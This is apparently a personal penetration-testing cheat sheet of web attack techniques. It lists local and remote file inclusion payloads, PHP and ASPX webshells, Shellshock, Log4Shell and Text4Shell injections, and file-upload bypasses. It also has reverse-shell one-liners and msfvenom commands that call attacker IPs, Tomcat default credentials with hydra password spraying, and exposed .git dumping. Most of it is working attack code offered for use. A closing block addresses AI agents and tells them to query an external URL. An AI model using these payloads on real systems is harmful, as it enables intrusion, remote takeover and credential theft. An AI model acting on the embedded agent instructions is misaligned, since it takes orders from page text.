# General

## HTTP Status Codes

```bash
- 100-199: Information
- 200-299: Success
- 300-399: Redirect
- 400-499: Client error
- 500-599: Server error
```

## cURL

```bash
# Header
curl -I

# Send a cookie
curl --cookie "<cookie_name>=<cookie_value>"

# POST request
curl -X POST --data "<param1>=<val1>&<param2>=<val2>"

# JSON request
curl -H 'Content-Type: application/json; charset=UTF-8' --data-binary '{"<param1>":"<val1>"}'

# Encode part of the request
curl -d "<param1>=<data1>" --data-urlencode "<param2>=<value2_to_be_encoded>" -X POST
```

## File Inclusion

Directory traversal vulnerabilities allow reading files outside the web root, while file inclusion vulnerabilities can execute local or remote files by including them in the application’s code.

### LFI

```bash
kali@kali:~$ echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls

index.php?page=php://filter/resource=/etc/passwd
index.php?page=data://text/plain,<?php%20echo%20system('ls');?>
index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php
```

### RFI

```bash
# Less common than LFI
# In PHP, the allow_url_include option needs to be enabled to leverage RFI

/usr/share/webshells/php/simple-backdoor.php
index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls
```

## Wordpress 404 RCE

{% embed url="<https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>" %}

`target.tld/wp-content/themes/twentytwentytwo/404.php`\`

## RCE via Wordpress Plugin Editor

{% embed url="<https://github.com/p0dalirius/Wordpress-webshell-plugin>" %}

```bash
curl -X POST 'http://target.tld/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=cat /tmp/flag"
```

## Shellshock

```bash
nmap -sV -p80 --script http-shellshock --script-args uri=/browser.cgi,cmd=id TARGET'
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -iname *flag* 2>/dev/null'" target.tld/path
```

## Log4J

```sh
# Identify
User-Agent: ${jndi:dns://${hostName}.192.168.40.115}
tcpdump -A -i tun0

# Exploit
github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Log4Shell.md
```

## Text4Shell

```sh
# URL encode & deliver via curl due to special chars
${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc IP 443 -e /bin/bash')}
```

## File Uploads

{% embed url="<https://book.hacktricks.xyz/pentesting-web/file-upload>" %}

```bash
# Payload in exif data
exiftool -UserComment='sh -i >& /dev/tcp/192.168.45.199/4444 0>&1' qais.jpg
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' qais.jpg
```

### Web Shells

```html
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```

```php
<?php echo system('id'); ?>
```

```php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo
"</pre>"; die; }?>
```

#### ASPX Upload

{% embed url="<https://raw.githubusercontent.com/tennc/webshell/refs/heads/master/fuzzdb-webshell/asp/cmd.aspx>" %}

* /usr/share/webshells/aspx/cmdasp.aspx

### Bypasses

{% embed url="<https://en.wikipedia.org/wiki/List_of_file_signatures>" %}

```php
cat shell.php
GIF89a;
<?php system($_GET['cmd']); ?>

file shell.php 
shell.php: GIF image data, version 89a, 2619 x 16188

shell.php?cmd=/usr/bin/busybox nc 192.168.45.202 4444 -e sh
```

### Webdav

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav>" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.206 LPORT=4444 -f exe >
reverse.exe
cadaver hutch.offsec
dav:/> put reverse.exe
/c c:\Inetpub\wwwroot\reverse.exe # Trigger via cmd.aspx
```

## GIT

{% embed url="<https://github.com/gitleaks/gitleaks>" %}

```bash
# Exposed /.git directory
wget -r http://target.com/.git/
cd target.com
git branch
git checkout branch/1
git diff
git log
git show c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54

# GUI
git-cola
```

## Tomcat

```sh
# Default Creds
tomcat:s3cret
tomcat:tomcat
admin:tomcat
admin:admin
admin:

# Spray
hydra -l tomcat -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -f IP http-get /manager/html

# Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.14.30.76 LPORT=443 -f war -o revshell.war 
nc -lvnp 443

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.qaisqais.com/web/general.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.